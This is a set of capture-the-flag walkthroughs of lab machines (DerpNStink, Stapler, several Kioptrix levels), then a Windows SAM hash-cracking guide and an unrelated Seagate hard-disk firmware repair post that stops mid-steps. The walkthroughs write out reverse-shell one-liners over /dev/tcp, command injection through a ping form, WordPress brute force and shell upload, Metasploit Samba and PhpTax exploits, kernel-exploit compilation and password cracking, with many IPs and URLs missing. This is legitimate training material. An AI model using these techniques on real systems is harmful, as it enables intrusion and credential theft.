DerpNStink: 1 walkthrough

Walkthrough of DerpNstink: 1


root@kali:~# nmap -sT -A -sV –version-intensity 6 -p-

21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
| 2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
| 256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_ 256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (EdDSA)
80/tcp open http Apache ht
| http-robots.txt: 2 disallowed entries
|_/php/ /temporary/
|_http-title: DeRPnStiNK

Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Nothing from the FTP server:

root@kali:~# nmap –script=*ftp* –script-args=unsafe=1 -p 20,21

Starting Nmap 7.50 ( ) at 2018-03-06 06:35 EST
Nmap scan report for
Host is up (0.00031s latency).

20/tcp closed ftp-data
21/tcp open ftp
| ftp-brute:
| Accounts: No valid accounts found
|_ Statistics: Performed 11315 guesses in 600 seconds, average tps: 18.7

Using metasploit we search for SSH users:

[+] – SSH – User ‘gopher’ found
[+] – SSH – User ‘kernoops’ found
[+] – SSH – User ‘libuuid’ found
[+] – SSH – User ‘list’ found
[+] – SSH – User ‘listen’ found
[+] – SSH – User ‘lp’ found
[+] – SSH – User ‘man’ found
[+] – SSH – User ‘mountfsys’ found
[+] – SSH – User ‘nobody’ found
[+] – SSH – User ‘nobody4’ found
[+] – SSH – User ‘nuucp’ found
[+] – SSH – User ‘sync’ found
[+] – SSH – User ‘web’ found
[+] – SSH – User ‘webmaster’ found
[+] – SSH – User ‘zabbix’ found

Using searchsplotit we find an OpenSSH vulnerability that might help identify SSH users:

python ./ -U /usr/share/wordlists/metasploit/unix_users.txt -e –trials 5 –bytes 10

User name enumeration against SSH daemons affected by CVE-2016-6210
Created and coded by 0_o (nu11.nu11 [at], PoC by Eddie Harari

[*] Testing SSHD at:, Banner: SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.8
[*] Getting baseline timing for authenticating non-existing users…………
[*] Baseline mean for host is 0.0631635 seconds.
[*] Baseline variation for host is 0.0109688798904 seconds.
[*] Defining timing of x < 0.0960701396712 as non-existing user.
[*] Testing your users…
[+] rfindd – timing: 0.110398
[+] root – timing: 0.1100708

[+] – SSH – User ‘gopher’ found
[[+] – SSH – User ‘kernoops’ found
[+] – SSH – User ‘libuuid’ found
[+] – SSH – User ‘list’ found
[+] – SSH – User ‘listen’ found
[+] – SSH – User ‘lp’ found
[+] – SSH – User ‘man’ found
[+] – SSH – User ‘mountfsys’ found
[+] – SSH – User ‘nobody’ found
[+] – SSH – User ‘nobody4’ found
[+] – SSH – User ‘nuucp’ found
[+] – SSH – User ‘sync’ found
[+] – SSH – User ‘web’ found
[+] – SSH – User ‘webmaster’ found
[+] – SSH – User ‘zabbix’ found

dirb finds us some interesting results:

—- Entering directory: —-
—- Entering directory: —-
—- Entering directory: —-

I can’t seem to find the phpmyadmin version, but I do find out the PHP version, which is PHP/5.5.9-1ubuntu4.22. This might actually help at some point.

Using a longer wordlist we find, which offers some clues:

We try to login via SSH, but we get trolled:

Aanother dirb result catches our attention.

This redirects to http://derpnstink.local/weblog/ which we cannot view, because of DNS resolution fail. So we add the following to our /etc/hosts file:

root@kali:~/Desktop/AUTOMATED_actions# cat /etc/hosts localhost kali

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

# stuff derpnstink.local www.derpnstink.local

Now we can access the page and it’s an obvious WordPress, so we fire wpscan to bruteforce some users:

wpscan –url http://derpnstink.local/weblog/ –wordlist /usr/share/wordlists/dirb/big.txt –threads 2

Brute Forcing ‘admin’ Time: 00:00:43 <========== > (1815 / 20470) 8.86% ETA: 00:07:28
| Id | Login | Name | Password |
| 1 | unclestinky | 404 Not | |
| 2 | admin | admin – DeRPnStiNK Professional | admin |

[+] Finished: Tue Mar 6 09:05:20 2018
[+] Requests Done: 22656

wpscan also finds some vulnerabilities:

We download and run

I copy a PHP reverse shell and run a netcat listener

cp /usr/share/webshells/php/php-reverse-shell.php ./

nc -lvvp 777

I edit the shell with my IP and port and run the exploit.

python ./ -t http://derpnstink.local/weblog/ -f ./php-reverse-shell.php -u admin -p admin

We have a limited shell:

Beautify the shell:

1 echo $SHELL
2 export TERM=xterm-256color
3 export SHELL=BASH
4 stty rows 55 columns 205
5 reset

We find some users in /etc/passwd

cat /etc/passwd
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
stinky:x:1001:1001:Uncle Stinky,,,:/home/stinky:/bin/bash
mrderp:x:1000:1000:Mr. Derp,,,:/home/mrderp:/bin/bash

In /var/www/html/weblog we find the SQL user and pass:

** The name of the database for WordPress */
define(‘DB_NAME’, ‘wordpress’);

/** MySQL database username */
define(‘DB_USER’, ‘root’);

/** MySQL database password */
define(‘DB_PASSWORD’, ‘mysql’);

Login to Mysql server:

mysql -uroot -pmysql

mysql> SELECT * FROM wp_users;
SELECT * FROM wp_users;
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name | flag2 |
| 1 | unclestinky | $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41 | unclestinky | unclestinky@DeRPnStiNK.local | | 2017-11-12 03:25:32 | 1510544888:$P$BQbCmzW/ICRqb1hU96nIVUFOlNMKJM1 | 0 | unclestinky | |
| 2 | admin | $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/ | admin | admin@derpnstink.local | | 2017-11-13 04:29:35 | | 0 | admin | |
2 rows in set (0.00 sec)


Using hashcat I recover the following passwords for wordpress:



We found the 1st flag by logging in wordpress with unclestinky



Clue in /support:

www-data@DeRPnStiNK:/support$ cat troubleshooting.txt
cat troubleshooting.txt
On one particular machine I often need to run sudo commands every now and then. I am fine with entering password on sudo in most of the cases.

However i dont want to specify each command to allow

How can I exclude these commands from password protection to sudo?


Thank you for contacting the Client Support team. This message is to confirm that we have resolved and closed your ticket.

Please contact the Client Support team at if you have any further questions or issues.

Thank you for using our product.


The pastebin page says:

mrderp ALL=(ALL) /home/mrderp/binaries/derpy*

It seems that we need to privesc to user mrderp to execute commands as sudo.

We go to /home

www-data@DeRPnStiNK:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x 4 root root 4.0K Nov 12 12:54 .
drwxr-xr-x 23 root root 4.0K Nov 12 13:39 ..
drwx—— 10 mrderp mrderp 4.0K Jan 9 12:15 mrderp
drwx—— 12 stinky stinky 4.0K Jan 9 12:14 stinky

Password reuse ?

su stinky
Password: wedgie57


We cannot seem to sudo with stinky

stinky@DeRPnStiNK:/home$ sudo su -l
sudo su -l
[sudo] password for stinky: wedgie57

stinky is not in the sudoers file. This incident will be reported.

Found several ssh private keys, none helped.



stinky@DeRPnStiNK:~/ftp/files/network-logs$ cat derpissues.txt
cat derpissues.txt
12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are…
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay
stinky@DeRPnStiNK:~/ftp/files/network-logs$ ls -a
ls -a
. .. derpissues.txt
stinky@DeRPnStiNK:~/ftp/files/network-logs$ pwd

Can’t use that because of permissions for tcpump, but we do find a pcap file in /home/stinky/Documents

We read it and search for papss in the txt file:

stinky@DeRPnStiNK:~/Documents$ tcpdump -qns 0 -X -r ./derpissues.pcap >> ./derpissues.txt
<ts$ tcpdump -qns 0 -X -r ./derpissues.pcap >> ./derpissues.txt
reading from file ./derpissues.pcap, link-type LINUX_SLL (Linux cooked)
stinky@DeRPnStiNK:~/Documents$ grep -i pass ./derpissues.txt
grep -i pass ./derpissues.txt
0x0400: 3034 3032 6166 3626 5f77 705f 6874 7470 0402af6&_wp_http
0x0410: 5f72 6566 6572 6572 3d25 3246 7765 626c _referer=%2Fwebl
0x0420: 6f67 2532 4677 702d 6164 6d69 6e25 3246 og%2Fwp-admin%2F
0x0430: 7573 6572 2d6e 6577 2e70 6870 2675 7365 user-new.php&use
0x0440: 725f 6c6f 6769 6e3d 6d72 6465 7270 2665 r_login=mrderp&e
0x0450: 6d61 696c 3d6d 7264 6572 7025 3430 6465 mail=mrderp%40de
0x0460: 7270 6e73 7469 6e6b 2e6c 6f63 616c 2666 rpnstink.local&f
0x0470: 6972 7374 5f6e 616d 653d 6d72 266c 6173 irst_name=mr&las
0x0480: 745f 6e61 6d65 3d64 6572 7026 7572 6c3d t_name=derp&url=
0x0490: 2532 4668 6f6d 6525 3246 6d72 6465 7270 %2Fhome%2Fmrderp
0x04a0: 2670 6173 7331 3d64 6572 7064 6572 7064 &pass1=derpderpd
0x04b0: 6572 7064 6572 7064 6572 7064 6572 7064 erpderpderpderpd
0x04c0: 6572 7026 7061 7373 312d 7465 7874 3d64 erp&pass1-text=d
0x04d0: 6572 7064 6572 7064 6572 7064 6572 7064 erpderpderpderpd
0x04e0: 6572 7064 6572 7064 6572 7026 7061 7373 erpderpderp&pass
0x04f0: 323d 6465 7270 6465 7270 6465 7270 6465 2=derpderpderpde
0x0500: 7270 6465 7270 6465 7270 6465 7270 2670 rpderpderpderp&p
0x0510: 775f 7765 616b 3d6f 6e26 726f 6c65 3d61 w_weak=on&role=a
0x0520: 646d 696e 6973 7472 6174 6f72 2663 7265 dministrator&cre
0x0530: 6174 6575 7365 723d 4164 642b 4e65 772b ateuser=Add+New+
0x0540: 5573 6572 User

We got the password:

stinky@DeRPnStiNK:~/Documents$ su mrderp
su mrderp
Password: derpderpderpderpderpderpderp

mrderp@DeRPnStiNK:/home/stinky/Documents$ id
uid=1000(mrderp) gid=1000(mrderp) groups=1000(mrderp)


Flag 3 found:

stinky@DeRPnStiNK:~/Desktop$ cat flag.txt
cat flag.txt


mrderp@DeRPnStiNK:~/Downloads$ sudo -l
sudo -l
[sudo] password for mrderp: derpderpderpderpderpderpderp

Matching Defaults entries for mrderp on DeRPnStiNK:
env_reset, mail_badpass,

User mrderp may run the following commands on DeRPnStiNK:
(ALL) /home/mrderp/binaries/derpy*

We create and add an nc reverse shell command, start the listener on localmachine:

mrderp@DeRPnStiNK:~/binaries$ echo ‘#!/bin/bash’ >>
echo ‘#!/bin/bash’ >>
mrderp@DeRPnStiNK:~/binaries$ echo ‘bash -i >& /dev/tcp/ 0>&1′ >>
>> derpy.shi >& /dev/tcp/ 0>&1’
mrderp@DeRPnStiNK:~/binaries$ cat
bash -i >& /dev/tcp/ 0>&1
mrderp@DeRPnStiNK:~/binaries$ chmod 777
chmod 777
mrderp@DeRPnStiNK:~/binaries$ sudo ./
sudo ./
[sudo] password for mrderp: derpderpderpderpderpderpderp

Got root ?

The flag:

root@DeRPnStiNK:/root/Desktop# cat flag.txt
cat flag.txt

Congrats on rooting my first VulnOS!

Hit me up on twitter and let me know your thoughts!



Stapler 1 walkthrough.

Stapler 1 vulnerable machine walkthrough.

Firing the recon script returns:

Starting Nmap 7.50 ( ) at 2018-02-27 07:35 EST
Nmap scan report for
Host is up (0.0011s latency).
Not shown: 65523 filtered ports
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can’t get directory listing: Can’t parse PASV response: “Permission denied.”
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
| 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_ 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (EdDSA)
53/tcp open domain dnsmasq 2.75
| dns-nsid:
|_ bind.version: dnsmasq-2.75
80/tcp open http PHP cli server 5.5 or later
|_http-title: 404 Not Found
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp open doom?
| fingerprint-strings:
| message2.jpgUT
| QWux
| “DL[E
| #;3[
| \xf6
| u([r
| qYQq
| Y_?n2
| 3&M~{
| 9-a)T
| L}AJ
|_ .npy.9
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
| mysql-info:
| Protocol: 10
| Version: 5.7.12-0ubuntu1
| Thread ID: 8
| Capabilities flags: 63487
| Some Capabilities: Speaks41ProtocolOld, Support41Auth, SupportsLoadDataLocal, Speaks41ProtocolNew, LongPassword, DontAllowDatabaseTableColumn, SupportsTransactions, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, InteractiveClient, SupportsCompression, ODBCClient, ConnectWithDatabase, LongColumnFlag, FoundRows, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: P\x01.”{%VMG\x02\x07s6fVY..jf
|_ Auth Plugin Name: 88
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech

enum4linux also finds:

Sharename Type Comment
——— —- ——-
print$ Disk Printer Drivers
kathy Disk Fred, What are we doing here?
tmp Disk All temporary files should be stored here
IPC$ IPC IPC Service (red server (Samba, Ubuntu))

[+] Attempting to map shares on
//$ Mapping: DENIED, Listing: N/A
// Mapping: OK, Listing: OK
// Mapping: OK, Listing: OK

I try the low hanging fruit from my Github page  and it’s a win.

msf > use exploit/linux/samba/is_known_pipename

msf exploit(linux/samba/is_known_pipename) > setg RHOST
msf exploit(linux/samba/is_known_pipename) > options

—- ————— ——– ———–
RHOST yes The target address
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory

Exploit target:

Id Name
— —-
0 Automatic (Interact)

msf exploit(linux/samba/is_known_pipename) > set RPORT 139
RPORT => 139
msf exploit(linux/samba/is_known_pipename) > set SMB_SHARE_NAME /tmp
msf exploit(linux/samba/is_known_pipename) > run

[*] – Using location \\\tmp\ for the path
[*] – Retrieving the remote path of the share ‘tmp’
[*] – Share ‘tmp’ has server-side path ‘/var/tmp
[*] – Uploaded payload to \\\tmp\
[*] – Loading the payload from server-side path /var/tmp/ using \\PIPE\/var/tmp/…
[-] – >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] – Loading the payload from server-side path /var/tmp/ using /var/tmp/…
[-] – >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] – Uploaded payload to \\\tmp\
[*] – Loading the payload from server-side path /var/tmp/ using \\PIPE\/var/tmp/…
[-] – >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] – Loading the payload from server-side path /var/tmp/ using /var/tmp/…
[+] – Probe response indicates the interactive payload was loaded…
[*] Found shell.
[*] Command shell session 1 opened ( -> at 2018-02-27 08:32:10 -0500

uid=0(root) gid=0(root) groups=0(root)

That was fast, but no pain means no gain.

I upgrade and beautify  the shell and print the flag:

python -c ‘import pty; pty.spawn(“/bin/bash”)’





Kioptrix 5 walkthrough

root@kali:~# netdiscover -r

Currently scanning: Finished! | Screen View: Unique Hosts

4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
IP At MAC Address Count Len MAC Vendor / Hostname
—————————————————————————– 00:50:56:c0:00:08 1 60 VMware, Inc. 00:50:56:e1:a9:71 1 60 VMware, Inc. 00:50:56:20:56:e2 1 60 VMware, Inc. 00:50:56:f8:bd:9c 1 60 VMware, Inc.


nmap -sT -sV -A -p- -n –open

Starting Nmap 7.50 ( ) at 2018-02-26 09:05 EST
Nmap scan report for
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:50:56:20:56:E2 (VMware)
Device type: general purpose|specialized
Running (JUST GUESSING): FreeBSD 9.X|10.X|7.X|8.X|6.X (93%),
Aggressive OS guesses: FreeBSD 9.0-RELEASE – 10.3-RELEASE (93%), AVtech Room Alert 26W environmental monitor (91%), Linux 2.6.18 – 2.6.22 (90%), FreeBSD 7.0-RELEASE – 9.0-RELEASE (88%), FreeBSD 7.0-RELEASE (87%), FreeBSD 7.1-PRERELEASE 7.2-STABLE (87%), FreeBSD 7.1-RELEASE (87%), FreeBSD 8.0-STABLE (87%), FreeBSD 8.1-RELEASE (86%), FreeBSD 6.2-RELEASE (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

PHP version & Apache are not useful because I am too lazy to try all or found exploits.

mod_ssl/2.2.21 related exploits also do not seem to work because there is no HTTPS on the server and the found exploits (Apache mod_ssl < 2.8.7 OpenSSL – ‘OpenFuck.c’ Remote Exploit) will not work because they need SSL.

dirb also finds nothing.

I browse to and I view source. Bingo!

<META HTTP-EQUIV=”refresh” CONTENT=”5;URL=pChart2.1.3/index.php”>

searchsploit to the rescue:



# Exploit Author: Balazs Makany
# Vendor Homepage:
# Software Link:
# Google Dork: intitle:”pChart 2.x – examples” intext:”2.1.3″
# Version: 2.1.3
# Tested on: N/A (Web Application. Tested on FreeBSD and Apache)
# CVE : N/A

[1] Directory Traversal:
The traversal is executed with the web server’s privilege and leads to
sensitive file disclosure (passwd, or similar),
access to source codes, hardcoded passwords or other high impact
consequences, depending on the web server’s configuration.
This problem may exists in the production code if the example code was
copied into the production environment.

We try different directory traversal customized URL, but they don’t work because I treat the host like a Linux system…and it is a FreeBSD one, so file locations are different.

/etc/passwd does not exist. Instead we have:

# $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $ # root:$1$DdHlo6rh$usiPcDoTR37eL7DAyLjhk1:0:0::0:0:Charlie &:/root:/bin/csh toor:*:0:0::0:0:Bourne-again Superuser:/root:

I fail to see that the root user actually has the password encrypted and I move along, searching for the equivalent of /etc/shadow, which is /etc/spwd.db, which does not load into the browser when I access:

Google searching finds me:

<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2

<Directory “/usr/local/www/apache22/data2”>
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser

Which means that if switch the HTTP user agent to Mozilla4, I might get a different webpage.

root@kali:~# curl -H “User-Agent:Mozilla/4.0” | head -n1

<title>PHPTAX by William L. Berggren 2003(c)</title> 100 4125 0 4125 0 0 2014k 0 –:–:– –:–:– –:–:– 2014k curl: (23) Failed writing body (4067 != 4230) root@kali:~#

root@kali:~# searchsploit phptax
---------------------------------------------------------- ----------------------------------
 Exploit Title | Path
 | (/usr/share/exploitdb/platforms/)
---------------------------------------------------------- ----------------------------------
PhpTax - pfilez Parameter Exec Remote Code Injection (Met | php/webapps/21833.rb
use exploit/multi/http/phptax_exec
set RPORT 8080

msf exploit(multi/http/phptax_exec) > run

[*] Started reverse TCP double handler on
[*] – Sending request…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo bPVG3SBi0VbyjPza;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Command: echo RHWVYqnt2WyVvZsH;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “bPVG3SBi0VbyjPza\r\n”
[*] Matching…
[*] A is input…
[*] Reading from socket B
[*] B: “RHWVYqnt2WyVvZsH\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 5 opened ( -> at 2018-02-26 17:22:01 -0500
[*] Command shell session 6 opened ( -> at 2018-02-26 17:22:01 -0500

uid=80(www) gid=80(www) groups=80(www)

We have limited shell.

uname -a reminds us that we are running FreeBSD 9.

We copy the exploit:

cp /usr/share/exploitdb/platforms/freebsd/local/28718.c ./

Upload it to the victim machine with nc:

nc -lvvp 8888 < ./28718.c   // sending from the attacking machine

nc -nv 8888 > ./28718.c  // receiving on the victim machine

chmod 777 ./28718.c

We compile and run the exploit:

Congratz to myself. I still feel like a noob.


Kioptrix: Level 1.1 (#2) walkthrough

This is a walkthrough of the Kioptrix: Level 1.1 (#2) vulnhub machine. Original link here:,23/

The scan:

root@kali:~# nmap -sT -A -O -p-

Starting Nmap 7.50 ( ) at 2018-02-24 07:35 EST
Nmap scan report for
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 625/udp status
|_ 100024 1 628/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=–
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2018-02-24T10:26:27+00:00; -2h09m39s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_64_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
628/tcp open status 1 (RPC #100024)
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:47:D4:2E (VMware)
Device type: general purpose|media device
Running: Linux 2.6.X, Star Track embedded
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:2.6.23 cpe:/h:star_track:srt2014hd
OS details: Linux 2.6.9 – 2.6.30, Star Track SRT2014HD satellite receiver (Linux 2.6.23)
Network Distance: 1 hop

First I tried exploiting port 631, which is the Linux printing service, CUPS, version 1.1

Searching for the exploit:

root@kali:~/junk/kioptrix1.2# searchsploit cups 1.1
——————————————— ———————————-
Exploit Title | Path
| (/usr/share/exploitdb/platforms/)
——————————————— ———————————-
CUPS 1.1.x – ‘.HPGL’ File Processor Buffer O | linux/remote/24977.txt
CUPS 1.1.x – Cupsd Request Method Denial of | linux/dos/22619.txt
CUPS 1.1.x – Negative Length HTTP Header | linux/remote/22106.txt
CUPS 1.1.x – UDP Packet Remote Denial of Ser | linux/dos/24599.txt
CUPS Server 1.1 – GET Request Denial of Serv | linux/dos/1196.c
——————————————— ———————————-

Generating the shell:

The exploit needs an .so payload, so I try it.

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=8443 -f elf-so >>
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of elf-so file: 369 bytes

For some reason, the exploit fails. Moving along.

Port 80 is open. we have an authentication form. Trying to bypass the authentication via SQL injection and it works:

Authentication is bypassed.

We are presented with a ping form, that should allow us to ping a network node.

We try command execution on it, while we setup a netcat listener on port 777 of our attacking machine.;bash -i >& /dev/tcp/ 0>&1

It works:

To privesc this we try the unix-privesc-script but no success.

Eventually I got it with a kernel exploit.

curl -k -o 9542.c

Compile it:

bash-3.00$ gcc -o 0x82-CVE-2009-2698 ./9542.c
./9542.c:109:28: warning: no newline at end of file

Run it:

Kioptrix level1.1 walkthrough

This is the Kioptrix vulnerable machine walkthrough.

You can download it from,22/

The scan:

root@kali:~# nmap -sT -sV -p-

Starting Nmap 7.50 ( ) at 2018-02-17 17:00 EST
Nmap scan report for
Host is up (0.00014s latency).
Not shown: 65529 closed ports
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:E2:87:5A (VMware)

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 18.92 seconds

We will search for vulnerabilities for mod_ssl/2.8.4.


root@kali:~/junk# searchsploit 764.c
————————————————————————————————————————————————————————– ———————————-
Exploit Title | Path
| (/usr/share/exploitdb/platforms/)
————————————————————————————————————————————————————————– ———————————-
Apache mod_ssl < 2.8.7 OpenSSL – ‘OpenFuckV2.c’ Remote Exploit | unix/remote/764.c
Microsoft Windows – VHDMP ZwDeleteFile Arbitrary File Deletion Privilege Escalation (MS16-138) | windows/local/40764.cs
Symantec AntiVirus – IOCTL Kernel Privilege Escalation (2) | windows/local/28764.c
TechSmith Snagit 10 (Build 788) – ‘dwmapi.dll’ DLL Hijacking | windows/local/14764.c
————————————————————————————————————————————————————————– ———————————-

We will try the first result.

Downloading the exploit in C format:


Install prerequisites

apt-get install libssl-dev libssl1.0-dev

Edit the C file.

nano 764.c

Include the following 2 lines on the SSL include area

#include <openssl/rc4.h>
#include <openssl/md5.h>

Search for wget (ctrl+W in nano) and replace the URL with this new one :

Compile the exploit:

sudo gcc -o OpenFucka ./764.c -lcrypto

Run the exploit:

root@kali:~/junk# ./OpenFucka 0x6b 443 -c 50

If everything works ok you should get your root shell:

Crack the Windows SAM file from a backup filesystem

The SAM file is locate in C:\Windows\System32\config and stores all Windows account password encrypted.

The problem is that you cannot copy or tamper the file while the file system is mounted.

This leaves us with at least 2 options: copy the SAM and SYTEM files from a Linux live CD or by having a copy of those files in a backup.

I have the backup and I copy the 2 files to my Kali Linux machine.

I recover the NTLM hashes by issuing the following command:

root@kali:~# /usr/bin/samdump2 /root/Desktop/SYSTEM /root/Desktop/SAM

The backup is from a Windows 7 version and that means that we are seeing NTLM v.2 hashes, which translates to the fact that only the last part of the hashes are useful.

So we need to convert to uppercase the bold part by using 2 BASH commands:

cristi@ubserver-nv:~/hashcat$ STRING=’f9a14effe4a24ceb1cf0b2e8e9e7e9f9
cristi@ubserver-nv:~/hashcat$ echo $STRING | awk ‘{print toupper($0)}’

Copy the uppercase version to a text file and start hashcat:

crs@ubsv:~$ ./hashcat -m 1000 -a 3 ./ntlm.txt -w 3 –status

Good luck!













Fix bricked Seagate ST31000340AS hard disk. BSY error

9 years ago I had this 1TB Seagate ST31000340AS hard disk that I was using as a primary drive for my Os and also the place to store all my photos, video clips and other important stuff.
At some point it simply failed to work. No strange sounds, no nothing. The BIOS would not recognize it, OS would not see it.

I left it like that for for 6-7 years, but in the last week I started informing myself about how to fix it.
I knew there wasn’t any mechanical issue with it and I was suspecting HDD firmware issues.

And my suspicion was right. There was a known glitch with multiple series of Seagate models, more specific – with their SD15 firmware.
Now the fun begins, because there is a solution to this issue.

The materials needed to fix:
1. bricked Seagate HDD

2. Torx T6 screwdriver










3. USB to UART Prolific PL2303HX convertor cable (3$). link to Amazon

Also found as “PL2303HX USB to UART TTL Cable Module 4p 4 pin RS232 Converter”.











4. A postit or a piece of paper, foldet 2-3 times or any other slim non electric conductive material.

5. Prolific PL2303HX drivers that actually work on Windows 10 (get the from here not the manufacturer’s website).

6. (optional) External HDD rack or connect the HDD directly to your motherboard via SATA and Molex ATX power cable.


Before we start, please be aware that there is a slight possibility that you will lose your data or break your HDD if you are not careful.

If you have important data that you cannot afford to lose, please go to a data recovery company to fix your hard drive.


Start the fixing process:

  • power off your PC or your external USB hard disk rack.
  • Important: make sure that the SATA or USB cable is disconnected from your PC/external HDD rack.
  • Remove any jumpers from the HDD. If you have any.
  • Take the Torx T6 screw driver and remove all 6 screws and detach the HDD PCB. Remember that the long screws are always connected on the corners of the HDD.
  • Place the folded postit between the PCB and the contacts for the drive head.  Leave the drive motor contacts in place.  Tighten the three screws closest to the motor contacts.  Leave the other three screws loose or removed.


HDD drive head


  • Install the USB adapter’s drivers (from the link provided at the beginning of the post) and make sure that Windows sees it as COM port in Device manager and you don’t have any yellow errors on it. Reboot if necessary.
  • Connect the USB adapter to the PC.
  • Go to Device manager and right click>> properties and make the following settings on you new installed USB/COM adapter:
